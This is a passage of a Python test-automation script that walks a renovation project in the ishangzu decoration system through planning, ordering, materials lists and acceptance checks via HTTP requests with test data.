'create_dept': '',\n 'create_time': '',\n 'sort': 0,\n 'type': ''\n }]\n }],\n 'check_remark': None,\n 'closed_water_test_result': 'Y',\n 'is_need_waterproofing': is_need_waterproofing,\n 'curOneLevelNode': None,\n 'curTwoLevelNode': None,\n 'door_card': None,\n 'door_key': None,\n 'electricity_card': None,\n 'electricity_meter_num': None,\n 'electricity_meter_remain': None,\n 'gas_card': None,\n 'gas_meter_num': None,\n 'gas_meter_remain': None,\n 'grade': 20,\n 'landlordGoods': None,\n 'project_id': self.project_id,\n 'reform_way_fact': None,\n 'reform_way_fact_name': '',\n 'remark': '测试',\n 'score_remark': None,\n 'water_card': None,\n 'water_card_remain': None,\n 'water_meter_num': None\n }\n result = myRequest(url, data)\n if result:\n # consoleLog(u'闭水完成')\n return\n\n score()\n profee()\n closed()\n consoleLog(u'量房完成')\n\n def projectOrder(self, rooms=3, livings=1, kitchens=1, bathrooms=2, balconys=2):\n \"\"\"项目计划\"\"\"\n\n def design_zone(zone_type, room_no, usearea, have_toilet=\"WITHOUT\", have_balcony=\"WITHOUT\", is_fictitious_room='N'):\n \"\"\"分割户型\"\"\"\n if have_toilet == \"HAVE\": # 卫生间\n have_toilet_name = \"有(4平米)\"\n toilet_area = \"4\"\n else:\n have_toilet_name = \"-\"\n toilet_area = \"0\"\n if have_balcony == \"HAVE\": # 阳台\n have_balcony_name = \"有(4平米)\"\n balcony_area = \"4\"\n else:\n have_balcony_name = \"-\"\n balcony_area = \"0\"\n if zone_type == 'ROOM': # 朝向\n zone_orientation = \"SOURTH\"\n zone_orientation_name = \"南\"\n else:\n zone_orientation = \"NORTH\"\n zone_orientation_name = \"北\"\n zone = {\n \"zone_type\": zone_type,\n \"zone_type_name\": dict.DecorationZoneType.get(zone_type),\n \"room_no\": room_no,\n \"room_no_name\": dict.DecorationRoomNo.get(room_no),\n \"zone_orientation\": zone_orientation,\n \"zone_orientation_name\": zone_orientation_name,\n \"have_toilet\": have_toilet,\n \"have_toilet_name\": have_toilet_name,\n \"toilet_area\": toilet_area,\n \"have_balcony\": have_balcony,\n \"have_balcony_name\": have_balcony_name,\n \"balcony_area\": balcony_area,\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": usearea,\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": is_fictitious_room\n }\n return zone\n\n zone_list = []\n for room_no in 
dict.DecorationRoomNo.keys():\n pass\n\n url = 'http://decorate.ishangzu.com/isz_decoration/decoHouseInfoController/saveOrUpdateApartment/saveApartment/projectOrder'\n img = upLoadPhoto(url=self.uploadPhotoURL, filename='LAYOUT.png') # 户型图上传\n data = {\n 'build_area': self.build_area,\n 'reform_way_fact': 'OLDRESTYLE',\n 'decoration_style': 'WUSHE_BREEZE',\n 'house_orientation': 'SOURTH',\n 'remould_rooms': rooms,\n 'remould_livings': livings,\n 'remould_kitchens': kitchens,\n 'remould_bathrooms': bathrooms,\n 'remould_balconys': balconys,\n 'info_id': self.info_id,\n 'module_type': 'projectOrder',\n 'handle_type': 'updateApartment',\n \"layout_attachs\": {\n \"attach_type\": \"LAYOUT\",\n \"imgs\": [{\n \"url\": img.url,\n \"img_id\": img.id,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"\"\n }]\n },\n 'zoneList': [\n {\n \"zone_type\": \"PUBLIC_TOILET\",\n \"zone_type_name\": \"公共卫生间\",\n \"room_no\": \"PUBLIC_TOILET_1\",\n \"room_no_name\": \"公共卫生间1\",\n \"zone_orientation\": \"NORTH\",\n \"zone_orientation_name\": \"北\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"4\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"KITCHEN\",\n \"zone_type_name\": \"厨房\",\n \"room_no\": \"KITCHEN_1\",\n \"room_no_name\": \"厨房\",\n \"zone_orientation\": \"EAST\",\n \"zone_orientation_name\": \"东\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"8\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"PARLOUR\",\n \"zone_type_name\": \"客厅\",\n \"room_no\": \"PARLOUR_1\",\n \"room_no_name\": \"客厅1\",\n \"zone_orientation\": \"EAST\",\n \"zone_orientation_name\": \"东\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"16\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"ROOM\",\n \"zone_type_name\": \"房间\",\n \"room_no\": \"METH\",\n \"room_no_name\": \"甲\",\n \"zone_orientation\": \"SOURTH\",\n \"zone_orientation_name\": \"南\",\n \"have_toilet\": \"HAVE\",\n \"have_toilet_name\": \"有(4平米)\",\n \"toilet_area\": \"4\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"11\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"ROOM\",\n \"zone_type_name\": \"房间\",\n \"room_no\": \"ETH\",\n \"room_no_name\": \"乙\",\n \"zone_orientation\": \"SOURTH\",\n \"zone_orientation_name\": 
\"南\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"12\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"ROOM\",\n \"zone_type_name\": \"房间\",\n \"room_no\": \"PROP\",\n \"room_no_name\": \"丙\",\n \"zone_orientation\": \"SOURTH\",\n \"zone_orientation_name\": \"南\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"13\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"BALCONY\",\n \"zone_type_name\": \"阳台\",\n \"room_no\": \"BALCONY_1\",\n \"room_no_name\": \"阳台1\",\n \"zone_orientation\": \"SOURTH\",\n \"zone_orientation_name\": \"南\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(0平米)\",\n \"window_area\": \"0\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"2\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"BALCONY\",\n \"zone_type_name\": \"阳台\",\n \"room_no\": \"BALCONY_2\",\n \"room_no_name\": \"阳台2\",\n \"zone_orientation\": \"SOURTH\",\n \"zone_orientation_name\": \"南\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"3\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n }\n ],\n 'project_id': self.project_id,\n 'project_no': self.project_no,\n 'entrust_type': self.entrust_type\n }\n result = myRequest(url, data)\n if result:\n consoleLog(u'项目方案制定完成')\n return\n\n def configList(self):\n \"\"\"物品清单\"\"\"\n\n def designConfigList():\n \"\"\"制定物品清单\"\"\"\n\n def getZoneId():\n \"\"\"获取甲房间的zone_id\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewConfigurationController/queryZone/%s' % self.project_id\n result = myRequest(url, method='get')\n if result:\n zoneInfo = result['obj']\n for i in zoneInfo:\n if i['function_zone'] == u'甲':\n zoneId = i['zone_id']\n return zoneId\n\n def confirm():\n \"\"\"制定订单\"\"\"\n zoneId = getZoneId()\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationConfigController/confirm'\n data = [\n {\n \"acceptance_num\": None,\n \"acceptance_num_this\": None,\n \"brand_id\": None,\n \"brand_name\": \"爱上租定制\",\n \"category_flag\": None,\n \"category_one_id\": None,\n \"category_one_len\": None,\n \"category_one_nm\": \"家具\",\n \"category_two_id\": None,\n \"category_two_nm\": \"书桌\",\n \"config_list_id\": None,\n \"config_list_status\": None,\n \"config_list_status_name\": None,\n \"create_name\": None,\n \"create_time\": None,\n \"create_uid\": None,\n \"deleted\": None,\n 
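# NOTE (annotation, not in the original source): most fields in this order item are sent as None\n                    # and appear to be populated server-side; the purchase, supplier and zone fields below carry\n                    # the actual order data.\n                    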
\"flag\": None,\n \"function_zone\": \"甲\",\n \"function_zone_len\": None,\n \"new_replenish_id\": None,\n \"order_type\": None,\n \"predict_delivery_date\": None,\n \"project_id\": self.project_id,\n \"purchase_num\": \"10\",\n \"purchase_order_no\": None,\n \"real_delivery_time\": None,\n \"remark\": None,\n \"remark_accept\": None,\n \"remark_return\": None,\n \"replacement_order\": None,\n \"return_num\": None,\n \"return_num_this\": None,\n \"standard_id\": None,\n \"standard_name\": \"0.86M(3.0)\",\n \"submit_time\": None,\n \"supplier_id\": \"8A2152435CF3FFF3015D0C64330F0011\",\n \"supplier_name\": \"浙江品至家具有限公司\",\n \"total_account\": None,\n \"total_paid\": 3100,\n \"unit_id\": None,\n \"unit_name\": \"张\",\n \"unit_price\": 310,\n \"update_time\": None,\n \"update_uid\": None,\n \"zone_id\": zoneId,\n \"index\": 0,\n \"disabled\": \"true\"\n }\n ]\n result = myRequest(url, data)\n if result:\n consoleLog(u'物品添加完成,准备下单')\n return\n\n def submitOrder():\n \"\"\"下单\"\"\"\n confirm()\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationConfigController/submitOrder'\n data = [{\n \"predict_delivery_date\": '%s 00:00:00' % addDays(2),\n \"project_id\": self.project_id,\n \"supplier_id\": \"8A2152435CF3FFF3015D0C64330F0011\",\n \"supplier_name\": \"家具供应商:浙江品至家具有限公司\"\n }]\n result = myRequest(url, data)\n if result:\n consoleLog(u'物品清单下单完成')\n return\n\n submitOrder()\n\n def acceptanceConfigList():\n \"\"\"物品清单验收\"\"\"\n\n def getSupplierOrderDetail(supplierId):\n \"\"\"获取物品清单信息\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationConfigController/supplierOrdersDetail'\n data = {\"project_id\": self.project_id, \"supplier_id\": supplierId}\n result = myRequest(url, data)\n if result:\n return result['obj']\n\n def acceptanceConfirm():\n \"\"\"验收确认\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationConfigController/acceptance/confirm'\n supplierIds = self.config_suppliers\n configsVo = []\n for supplierId in supplierIds:\n configs = getSupplierOrderDetail(supplierId)\n for config in configs:\n configsVo.append(config)\n for i in configsVo:\n i['real_delivery_time'] = time.strftime('%Y-%m-%d %H:%M:%S')\n result = myRequest(url, configsVo)\n if result:\n consoleLog(u'物品清单验收完成!')\n return\n\n acceptanceConfirm()\n\n designConfigList()\n acceptanceConfigList()\n\n def stuffList(self):\n \"\"\"装修清单\"\"\"\n\n commonData = [\n {\n \"acceptance_num\": None,\n \"acceptance_num_this\": 0,\n \"acceptance_time\": None,\n \"create_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"create_uid\": self.user.user_id,\n \"data_type\": \"成品安装\",\n \"data_type_len\": 26,\n \"decoration_detial\": \"家具安装\",\n \"deleted\": 0,\n \"function_zone\": \"甲\",\n \"function_zone_len\": 100,\n \"hard_deliver_audit_status\": None,\n \"order_type\": None,\n \"predict_delivery_date\": None,\n \"project_id\": self.project_id,\n \"purchase_num\": \"10\",\n \"purchase_order_no\": None,\n \"remark\": None,\n \"remark_accept\": None,\n \"remark_detail\": \"\",\n \"remark_return\": None,\n \"replacement_order\": None,\n \"return_name\": None,\n \"return_num\": None,\n \"return_num_this\": 0,\n \"stuff_fees_change_reason\": None,\n \"stuff_list_id\": None,\n \"stuff_list_status\": \"DRAFT\",\n \"submit_time\": None,\n \"supplier_id\": None,\n \"supplier_name\": None,\n \"total_account\": None,\n \"total_paid\": \"100.00\",\n \"unit_id\": None,\n \"unit_name\": \"件\",\n \"unit_price\": 10,\n \"update_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"update_uid\": 
self.user.user_id,\n \"zone_type\": None,\n \"type_index\": 0,\n \"fun_index\": 0\n }, {\n \"acceptance_num\": None,\n \"acceptance_num_this\": 0,\n \"acceptance_time\": None,\n \"create_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"create_uid\": self.user.user_id,\n \"data_type\": \"成品安装\",\n \"data_type_len\": 26,\n \"decoration_detial\": \"嵌入式天花灯-改造\",\n \"deleted\": 0,\n \"function_zone\": \"甲\",\n \"function_zone_len\": 100,\n \"hard_deliver_audit_status\": None,\n \"order_type\": None,\n \"predict_delivery_date\": None,\n \"project_id\": self.project_id,\n \"purchase_num\": \"11\",\n \"purchase_order_no\": None,\n \"remark\": None,\n \"remark_accept\": None,\n \"remark_detail\": \"\",\n \"remark_return\": None,\n \"replacement_order\": None,\n \"return_name\": None,\n \"return_num\": None,\n \"return_num_this\": 0,\n \"stuff_fees_change_reason\": None,\n \"stuff_list_id\": None,\n \"stuff_list_status\": \"DRAFT\",\n \"submit_time\": None,\n \"supplier_id\": None,\n \"supplier_name\": None,\n \"total_account\": None,\n \"total_paid\": \"264.00\",\n \"unit_id\": None,\n \"unit_name\": \"个\",\n \"unit_price\": 24,\n \"update_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"update_uid\": self.user.user_id,\n \"zone_type\": None,\n \"fun_index\": 1,\n \"type_index\": 1\n }, {\n \"acceptance_num\": None,\n \"acceptance_num_this\": 0,\n \"acceptance_time\": None,\n \"create_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"create_uid\": self.user.user_id,\n \"data_type\": \"成品安装\",\n \"data_type_len\": 26,\n \"decoration_detial\": \"明装筒灯-改造\",\n \"deleted\": 0,\n \"function_zone\": \"甲\",\n \"function_zone_len\": 100,\n \"hard_deliver_audit_status\": None,\n \"order_type\": None,\n \"predict_delivery_date\": None,\n \"project_id\": self.project_id,\n \"purchase_num\": \"12\",\n \"purchase_order_no\": None,\n \"remark\": None,\n \"remark_accept\": None,\n \"remark_detail\": \"\",\n \"remark_return\": None,\n \"replacement_order\": None,\n \"return_name\": None,\n \"return_num\": None,\n \"return_num_this\": 0,\n \"stuff_fees_change_reason\": None,\n \"stuff_list_id\": None,\n \"stuff_list_status\": \"DRAFT\",\n \"submit_time\": None,\n \"supplier_id\": None,\n \"supplier_name\": None,\n \"total_account\": None,\n \"total_paid\": \"403.20\",\n \"unit_id\": None,\n \"unit_name\": \"个\",\n \"unit_price\": 33.6,\n \"update_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"update_uid\": self.user.user_id,\n \"zone_type\": None,\n \"fun_index\": 1,\n \"type_index\": 1\n }\n ]\n\n def designStuffList():\n \"\"\"制定装修清单\"\"\"\n\n def preview():\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationStuffController/preview'\n data = commonData\n result = myRequest(url, data)\n if result:\n return\n\n def saveStuffLists():\n preview()\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationStuffController/saveStuffLists'\n projectInfo = sqlbase.serach(\n \"select b.address,a.config_order_no,b.contract_id,b.contract_num,b.create_time,b.entrust_end_date,b.entrust_start_date,b.house_code,b.housekeep_mange_uid,b.info_id,\"\n \"a.project_no,b.sign_date,b.city_code,b.city_name from %s.decoration_house_info b inner join %s.new_decoration_project a on a.info_id=b.info_id and a.project_id='%s'\" % (\n get_conf('db', 'decoration_db'), get_conf('db', 'decoration_db'), self.project_id))\n construct_person = UserInfo(self.construct_uid)\n data = {\n \"newStuffList\": commonData,\n \"project\": {\n \"address\": self.address,\n \"build_area\": self.build_area,\n \"cable_laying_type\": 
\"INNERPIPEINNERLINE\",\n                \"cable_laying_type_name\": None,\n                \"city_code\": self.city_code,\n                \"city_name\": self.city_name,\n                \"closed_water_test_result\": self.closed_water_test_result,\n                \"complete_two_nodes\": self.complete_two_nodes,\n                \"complete_two_nodes_list\": self.complete_two_nodes,\n                \"config_list_status\": self.config_list_status,\n                \"config_list_status_name\": get_dict_value(self.config_list_status),\n                \"config_order_no\": self.config_order_no,\n                \"config_progress\": self.config_progress,\n                \"config_progress_name\": get_dict_value(self.config_progress),\n                \"config_submit_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n                \"config_submit_uid\": self.config_submit_uid,\n                \"config_submit_uname\": self.config_submit_uname,\n                \"construct_uid\": self.construct_uid,\n                \"construct_uname\": self.construct_uname,\n                \"construct_uname_phone\": \"%s/%s\" % (construct_person.user_name, construct_person.user_phone),\n                \"contract_id\": self.contract_id,\n                \"contract_num\": self.contract_num,\n                \"contract_type\": self.contract_type,\n                \"contract_type_name\": get_dict_value(self.contract_type),\n                \"create_time\": self.create_time,\n                \"create_uid\": self.create_uid,\n                \"current_one_node\": self.current_one_node,\n                \"decoration_style\": \"WUSHE_BREEZE\",\n                \"decoration_style_name\": \"随寓和风\",\n                \"deleted\": 0,\n                \"deliver_room_date\": \"1970-01-02 00:00:00.0\",\n                \"dispach_remark\": \"测试\",\n                \"entrust_end_date\": self.entrust_end_date,\n                \"entrust_start_date\": self.entrust_start_date,\n                \"entrust_type_fact\": \"SHARE\",\n                \"entrust_type_fact_name\": \"合租\",\n                \"grade\": 20,\n                \"hidden_check_date\": \"1970-01-02 00:00:00.0\",\n                \"house_code\": self.house_code,\n                \"housekeep_mange_name\": None,\n                \"housekeep_mange_uid\": self.housekeep_mange_uid,\n                \"info_id\": self.info_id,\n                \"is_active\": \"Y\",\n                \"is_active_name\": \"是\",\n                \"one_level_nodes\": self.one_level_nodes,\n                \"order_status_name\": \"进程中\",\n                \"order_type_name\": \"新收配置订单\",\n                \"overall_check_date\": \"1970-01-02 00:00:00.0\",\n                \"phone\": \"18815286582\",\n                \"place_order_date\": self.place_order_date,\n                \"place_order_dep\": \"\",\n                \"place_order_dep_name\": None,\n                \"place_order_reason\": \"测试\",\n                \"place_order_uid\": self.user.user_id,\n                \"place_order_uname\": self.user.user_name,\n                \"plumbing_type\": \"INNERPIPE\",\n                \"plumbing_type_name\": None,\n                \"predict_complete_date\": \"\",\n                \"predict_days\": 0,\n                \"predict_hidden_check_date\": '%s 00:00:00' % addDays(2),\n                \"predict_overall_check_date\": '%s 00:00:00' % addDays(2),\n                \"predict_stuff_check_date\": '%s 00:00:00' % addDays(2),\n                \"predict_survey_date\": '%s 09:00:00' % addDays(2),\n                \"project_id\": self.project_id,\n                \"project_no\": projectInfo[10],\n                \"project_order_status\": \"INPROCESS\",\n                \"project_order_type\": \"NEW_COLLECT_ORDER\",\n                \"reform_way\": \"OLDRESTYLE\",\n                \"reform_way_fact\": \"OLDRESTYLE\",\n                \"reform_way_fact_name\": \"老房全装\",\n                \"reform_way_name\": \"老房全装\",\n                \"remark\": \"\",\n                \"room_toilet\": \"3/2\",\n                \"sign_date\": projectInfo[11],\n                \"sign_name\": None,\n                \"sign_uid\": \"8A2152435DC1AEAA015DDE96F9276279\",\n                \"sign_user_phone\": None,\n                \"start_time\": '%s 00:00:00' % addDays(2),\n                \"stuff_check_date\": \"1970-01-02 00:00:00.0\",\n                \"stuff_list_status\": \"DRAFT\",\n                \"stuff_list_status_name\": \"待下单\",\n                \"stuff_order_no\": \"\",\n                \"stuff_submit_time\": \"1970-01-02 00:00:00.0\",\n                \"stuff_submit_uid\": \"\",\n                \"stuff_submit_uname\": \"\",\n                \"supplier_id\": \"8A2152435FBAEFC3015FBAEFC3000000\",\n                \"supplier_name\": \"测试专用硬装供应商\",\n                
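# NOTE (annotation, not in the original source): the supplier and sign IDs in this payload are\n                # hard-coded staging fixtures (the \"测试专用\" names mean test-only); they are assumed to be\n                # valid only in the author's test environment.\n                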
\"supplier_uid\": \"8AB398CA5FBAF072015FBB26338A0002\",\n \"supplier_uname\": \"测试专用硬装员工\",\n \"supplier_uname_phone\": \"测试专用硬装员工/18815286582\",\n \"timeMap\": None,\n \"total_paid\": 0,\n \"two_level_nodes\": \"[\\\"VOLUME_SCORE\\\",\\\"SURVEY_PROPERTY_DELIVERY\\\",\\\"WATER_CLOSED_TEST\\\",\\\"DECORATION_CONFIG_LIST\\\",\\\"GOODS_CONFIG_LIST\\\",\\\"PROJECT_PLAN\\\",\\\"CONCEALMENT_ACCEPTANCE\\\",\\\"HARD_ACCEPTANCE\\\",\\\"ACCEPTANCE_PROPERTY_DELIVERY\\\",\\\"COST_SETTLEMENT\\\",\\\"OVERALL_ACCEPTANCE\\\",\\\"HOUSE_DELIVERY\\\",\\\"INDOOR_PICTURE\\\"]\",\n \"update_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"update_uid\": \"8AEF8688600F30F30160257579287F96\",\n \"wall_condition\": \"OLDHOUSE\",\n \"wall_condition_name\": None\n }\n }\n result = myRequest(url, data)\n if result:\n consoleLog(u'装修清单制定完成')\n return\n\n self.update()\n saveStuffLists()\n\n def acceptanceStuffList():\n \"\"\"装修清单验收\"\"\"\n geturl = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationStuffController/getSuffList/%s' % self.project_id\n result = myRequest(geturl, method='get')\n if result:\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationStuffController/acceptanceAll'\n acceptance_time = time.strftime('%Y-%m-%d %H:%M:%S')\n data = result['obj']['newStuffList']\n for stufflist in data:\n stufflist['acceptance_time'] = acceptance_time\n stufflist['acceptance_num_this'] = stufflist['purchase_num']\n result = myRequest(url, data)\n if result:\n consoleLog(u'装修清单验收完成')\n return\n\n designStuffList()\n acceptanceStuffList()\n\n def hideAndStufCheck(self):\n \"\"\"施工中\"\"\"\n\n def hideCheck():\n \"\"\"隐蔽验收\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/constructing/hideCheck'\n data = {\n \"air_switch\": None,\n \"attachments\": [{\n \"attach_type\": \"TOILET\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"TOILET\"\n }]\n }, {\n \"attach_type\": \"KITCHEN\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 1,\n \"type\": \"KITCHEN\"\n }]\n }, {\n \"attach_type\": \"LIVING_ROOM\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 2,\n \"type\": \"LIVING_ROOM\"\n }]\n }, {\n \"attach_type\": \"BALCONY\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 3,\n \"type\": \"BALCONY\"\n }]\n }, {\n \"attach_type\": \"OTHER\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 4,\n \"type\": \"OTHER\"\n }]\n }],\n \"check_remark\": \"\",\n \"closed_water_test_result\": None,\n \"curOneLevelNode\": None,\n \"curTwoLevelNode\": None,\n \"door_card\": None,\n \"door_key\": None,\n \"electricity_card\": None,\n \"electricity_meter_num\": None,\n \"electricity_meter_remain\": None,\n \"gas_card\": None,\n \"gas_meter_num\": None,\n \"gas_meter_remain\": None,\n \"grade\": None,\n \"hidden_check_date\": '%s 09:00:00' % addDays(1),\n \"landlordGoods\": None,\n \"project_id\": self.project_id,\n 
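# NOTE (annotation, not in the original source): hideCheck reuses the generic progress-change\n                # schema, so most fields are deliberately None; essentially only hidden_check_date, project_id\n                # and the per-zone attachments carry values here.\n                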
\"reform_way_fact\": None,\n \"reform_way_fact_name\": \"\",\n \"remark\": None,\n \"score_remark\": None,\n \"water_card\": None,\n \"water_card_remain\": None,\n \"water_meter_num\": None\n }\n for attachment in data['attachments']:\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='%s.png' % attachment['attach_type'])\n attachment['imgs'][0]['url'] = IMG.url\n attachment['imgs'][0]['img_id'] = IMG.id\n result = myRequest(url, data)\n if result:\n consoleLog(u'隐蔽验收完成')\n return\n\n def stufCheck():\n \"\"\"硬装验收\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/constructing/stufCheck'\n data = {\n \"air_switch\": None,\n \"attachments\": [{\n \"attach_type\": \"TOILET\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"TOILET\"\n }]\n }, {\n \"attach_type\": \"KITCHEN\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 1,\n \"type\": \"KITCHEN\"\n }]\n }, {\n \"attach_type\": \"LIVING_ROOM\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 2,\n \"type\": \"LIVING_ROOM\"\n }]\n }, {\n \"attach_type\": \"ROOM\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 3,\n \"type\": \"ROOM\"\n }]\n }, {\n \"attach_type\": \"OTHER\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 4,\n \"type\": \"OTHER\"\n }]\n }],\n \"check_remark\": \"\",\n \"closed_water_test_result\": None,\n \"curOneLevelNode\": None,\n \"curTwoLevelNode\": None,\n \"door_card\": None,\n \"door_key\": None,\n \"electricity_card\": None,\n \"electricity_meter_num\": None,\n \"electricity_meter_remain\": None,\n \"gas_card\": None,\n \"gas_meter_num\": None,\n \"gas_meter_remain\": None,\n \"grade\": None,\n \"hidden_check_date\": None,\n \"stuff_check_date\": '%s 09:00:00' % addDays(1),\n \"landlordGoods\": None,\n \"project_id\": self.project_id,\n \"reform_way_fact\": None,\n \"reform_way_fact_name\": \"\",\n \"remark\": None,\n \"score_remark\": None,\n \"water_card\": None,\n \"water_card_remain\": None,\n \"water_meter_num\": None\n }\n for attachment in data['attachments']:\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='%s.png' % attachment['attach_type'])\n attachment['imgs'][0]['url'] = IMG.url\n attachment['imgs'][0]['img_id'] = IMG.id\n result = myRequest(url, data)\n if result:\n consoleLog(u'硬装验收完成')\n return\n\n hideCheck()\n stufCheck()\n\n def projectCheck(self):\n \"\"\"项目验收\"\"\"\n\n def wholeCheck():\n \"\"\"整体验收\"\"\"\n url = 